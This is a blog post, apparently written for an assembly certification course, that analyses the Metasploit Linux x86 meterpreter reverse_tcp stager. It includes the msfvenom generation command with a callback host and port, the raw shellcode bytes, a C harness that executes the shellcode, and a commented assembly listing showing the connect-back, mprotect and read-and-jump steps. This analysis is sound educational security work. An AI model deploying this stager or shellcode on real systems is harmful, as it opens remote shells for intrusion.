Content
- Introduction
- Generate shellcode
- Compile POC and retrieve shellcode source
- Disassemble shellcode
- Analysis
1. Introduction
I’ve always been intrigued by by the the little intricacies of life that I do not fully understand.
Don’t get me wrong, I do like the magical feeling of surprise and I thoroughly appreciate the mystique. I do however have my reservations when it comes to shellcode that I haven’t written myself.
This reservation might stem from some kind of digital survival instinct (reinforced by the “OpenSSH <= 5.3 remote root 0day exploit“) or it might simply be my drive to ever keep learning. Whatever the reason, I wanted to now how the shellcode works that I’ve been using for a while to pop dozens of boxes: linux/x86/meterpreter/reverse_tcp
2. Generate shellcode
A few things to be aware of when dissecting msf payloads:
- the shellcodes will lack sections, thus the use of objdump will be limited. We could try forcing it to work via the following command but I decided against it:
objdump -b binary -D -m i386 <shellcode> -M intel
- piping the output from msfvenom to “ndisasm -u -” would produce assembly code in a weird dialect and that would confuse me.
I am going to create the raw shellcode to paste into our shellcode.c POC for further analysis:
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=1337 -a x86 --platform Linux -f c No encoder or badchars specified, outputting raw payload unsigned char buf[] = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80" "\x97\x5b\x68\xc0\xa8\x64\x0f\x68\x02\x00\x05\x39\x89\xe1\x6a" "\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10" "\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b" "\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1";
Let’s pop it into our POC:
#include<stdio.h> #include<string.h> unsigned char code[] = \ "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80" "\x97\x5b\x68\xc0\xa8\x64\x0f\x68\x02\x00\x05\x39\x89\xe1\x6a" "\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10" "\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b" "\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1"; main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }
3. Compile the shellcode POC and extract the shellcode source code
We know that it works so let’s jump right into it with gdb:
root@kali:~/# gdb -q shellcode Reading symbols from /root/git/slae-assignment5/shellcode...(no debugging symbols found)...done. (gdb) set disassembly-flavor intel (gdb) break main Breakpoint 1 at 0x804844f (gdb) run Starting program: /root/git/slae-assignment5/shellcode warning: no loadable sections found in added symbol-file system-supplied DSO at 0xb7fe0000 Breakpoint 1, 0x0804844f in main () (gdb) disassemble Dump of assembler code for function main: 0x0804844c <+0>: push ebp 0x0804844d <+1>: mov ebp,esp => 0x0804844f <+3>: and esp,0xfffffff0 0x08048452 <+6>: sub esp,0x20 0x08048455 <+9>: mov DWORD PTR [esp],0x8049700 0x0804845c <+16>: call 0x8048340 <strlen@plt> 0x08048461 <+21>: mov DWORD PTR [esp+0x4],eax 0x08048465 <+25>: mov DWORD PTR [esp],0x8048520 0x0804846c <+32>: call 0x8048320 <printf@plt> 0x08048471 <+37>: mov DWORD PTR [esp+0x1c],0x8049700 0x08048479 <+45>: mov eax,DWORD PTR [esp+0x1c] 0x0804847d <+49>: call eax 0x0804847f <+51>: leave 0x08048480 <+52>: ret End of assembler dump. (gdb) break *0x0804847d Breakpoint 2 at 0x804847d (gdb) c Continuing. Shellcode Length: 24 Breakpoint 2, 0x0804847d in main () (gdb) stepi 0x08049700 in code () (gdb) disassemble Dump of assembler code for function code: => 0x08049700 <+0>: xor ebx,ebx 0x08049702 <+2>: mul ebx 0x08049704 <+4>: push ebx 0x08049705 <+5>: inc ebx 0x08049706 <+6>: push ebx 0x08049707 <+7>: push 0x2 0x08049709 <+9>: mov al,0x66 0x0804970b <+11>: mov ecx,esp 0x0804970d <+13>: int 0x80 0x0804970f <+15>: xchg edi,eax 0x08049710 <+16>: pop ebx 0x08049711 <+17>: push 0xf64a8c0 0x08049716 <+22>: push 0x39050002 0x0804971b <+27>: mov ecx,esp 0x0804971d <+29>: push 0x66 0x0804971f <+31>: pop eax 0x08049720 <+32>: push eax 0x08049721 <+33>: push ecx 0x08049722 <+34>: push edi 0x08049723 <+35>: mov ecx,esp 0x08049725 <+37>: inc ebx 0x08049726 <+38>: int 0x80 0x08049728 <+40>: mov dl,0x7 0x0804972a <+42>: mov ecx,0x1000 0x0804972f <+47>: mov ebx,esp 0x08049731 <+49>: shr ebx,0xc 0x08049734 <+52>: shl ebx,0xc 0x08049737 <+55>: mov al,0x7d 0x08049739 <+57>: int 0x80 0x0804973b <+59>: pop ebx 0x0804973c <+60>: mov ecx,esp 0x0804973e <+62>: cdq 0x0804973f <+63>: mov dh,0xc 0x08049741 <+65>: mov al,0x3 0x08049743 <+67>: int 0x80 0x08049745 <+69>: jmp ecx End of assembler dump. (gdb)
And there is our meterpreter reverse shell in assembly.
4. Disassemble shellcode
I’m going to cut and paste it into it’s own source file for detailed analysis:
; Filename: msf-revshell.nasm ; Author: Re4son re4son [at] whitedome.com.au ; Website: http://www.whitedome.com.au/re4son ; ; Purpose: Disassembly of msf linux/x86/meterpreter/reverse_tcp ; for research purpose global _start section .text _start: xor ebx,ebx mul ebx push ebx inc ebx push ebx push 0x2 mov al,0x66 mov ecx,esp int 0x80 xchg edi,eax pop ebx push 0xf64a8c0 push 0x39050002 mov ecx,esp push 0x66 pop eax push eax push ecx push edi mov ecx,esp inc ebx int 0x80 mov dl,0x7 mov ecx,0x1000 mov ebx,esp shr ebx,0xc shl ebx,0xc mov al,0x7d int 0x80 pop ebx mov ecx,esp cdq mov dh,0xc mov al,0x3 int 0x80 jmp ecx
5. Analysis
In addition to this source file I am going to create a handy graphic representation of the program using libemu:
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.100.15 LPORT=1337 -a x86 --platform Linux | /usr/bin/sctest -vvv -Ss 100000 -G msf_rev_shell.dot root@kali:~# dot msf_rev_shell.dot -Tpng -o msf_rev_shell.png
libemu choked a bit at the end but got us a nice result:
We can clearly see that our shellcode has four parts (the last one was omitted by libemu but can be seen in the assembly). The first two of which are pretty much a copy and paste from our reverse shell from the previous chapter:
1. Create a socket: We push our parameters (0, 1, 2) onto the stack, store the address in ecx, socket call subfuntion 1 in ebx, socket system call function 102 in eax and execute an int080
2. Connect: We push our IP address, port and socket structure attributes onto the stack, store the address in ecx, the connect sub function number (1) in ebx, socket system call function 102 in eax and execute an int080.
3. Mprotect: This is where it gets interesting. The last section in the graph sets up a system call with the number 125. According to our system call table, this call is mprotect, which sets protection on a region of memory according to man mprotect:
int mprotect(void *addr, size_t len, int prot); mprotect() changes protection for the calling process's memory page(s) containing any part of the address range in the interval [addr, addr+len-1]. addr must be aligned to a page boundary. If the calling process tries to access memory in a manner that violates the protection, then the kernel generates a SIGSEGV signal for the process. prot is either PROT_NONE or a bitwise-or of the other values in the following list: PROT_NONE (0x0) The memory cannot be accessed at all. PROT_READ (0x1) The memory can be read. PROT_WRITE (0x2) The memory can be modified. PROT_EXEC (0x4) The memory can be executed.
It seems that our shellcode prepares a chunk of the stack for storage and execution of our stage 2 shellcode, but let’s confirm that by analyzing the code step by step:
mov dl,0x7 ; set the permit - read (1), write (2) and execute flags (4) in edx mov ecx,0x1000 ; define the size of the region as 4096 bytes mov ebx,esp ; define the top of the stack as the start of the region shr ebx,0xc ; shift ebx 3 nibbles to the right to zero out the 12 least significant bits shl ebx,0xc ; and move 12 zeros back, effectively moving the buffer ahead of the stack by 1348 bytes mov al,0x7d ; move system function call number 125 into al int 0x80 ; invoke mprotect system call
Bingo. Let’s see where that puts our buffer in memory:
There it is, just underneath the stack: our 4k executable buffer for all the mischief that we have planned for later.
4. Read: The last section, which didn’t make it into our graph, sets up a system call with the number 3. According to our system call table, this call is read, which would make sense as our main purpose is to download the second stage of our shellcode.
According to our man 2 read:
ssize_t read(int fd, void *buf, size_t count); read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.
There we have it.
Let’s again confirm our theory by analyzing eaqch step:
pop ebx ; store our file descriptor in ebx (pushed during the connect() ) mov ecx,esp ; store pointer to our (nicely prepared) buffer in ecx cdq ; zero out edx mov dh,0xc ; set the size to 3072 bytes mov al,0x3 ; move system function call number 3 into al int 0x80 ; invoke read system call jmp ecx ; redirect code execution to the downloaded shellcode
Voila, it all makes perfect sense now:
; Filename: msf-revshell.nasm ; Author: Re4son re4son [at] whitedome.com.au ; Website: http://www.whitedome.com.au/re4son ; ; Purpose: Disassembly of msf linux/x86/meterpreter/reverse_tcp ; for research purpose global _start section .text _start: ; Create socket xor ebx,ebx ; zero out ebx mul ebx ; zero out eax & edx push ebx ; push IPPROTO = 0 inc ebx push ebx ; push SOCK_STREAM=1 push 0x2 ; push AF_INET=2 mov al,0x66 ; store sys_socketcall system call number in al mov ecx,esp ; store pointer to arguments in ecx int 0x80 ; invoke system call xchg edi,eax ; store the socket file descriptor in edi ; Connect pop ebx ; pop connect sub function number 1 into ebx push 0xf64a8c0 ; push IP address 192.168.100.15 push 0x39050002 ; push port 1337 mov ecx,esp ; store pointer to arguments in ecx push 0x66 ; store sys_socketcall system call number in al pop eax push eax ; use eax as sizeof(struct sockaddr_in) push ecx ; &serv_addr push edi ; our socket descriptor mov ecx,esp ; store pointer to arguments in ecx inc ebx ; inc sub function call number to 3 for connect int 0x80 ; invoke system call ; Prepare buffer for incomming stage 2 shellcode mov dl,0x7 ; set the permit - read (1), write (2) and execute flags (4) in edx mov ecx,0x1000 ; define the size of the region as 4096 bytes mov ebx,esp ; define the top of the stack as the start of the region shr ebx,0xc ; shift ebx 3 nibbles to the right to zero out the 12 least significant bits shl ebx,0xc ; and move 12 zeros back, effectively moving the buffer ahead of the stack by 1348 bytes mov al,0x7d ; move system function call number 125 into al int 0x80 ; invoke mprotect system call ; retrieve stage 2 shellcode pop ebx ; store our file descriptor in ebx (pushed during the connect() ) mov ecx,esp ; store pointer to our (nicely prepared) buffer in ecx cdq ; zero out edx mov dh,0xc ; set the size to 3072 bytes mov al,0x3 ; move system function call number 3 into al int 0x80 ; invoke read system call jmp ecx ; redirect code execution to the downloaded shellcode
Let’s make sure it all works as intended:
Perfect. Job well done.
All files are available on github.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student-ID: SLAE – 674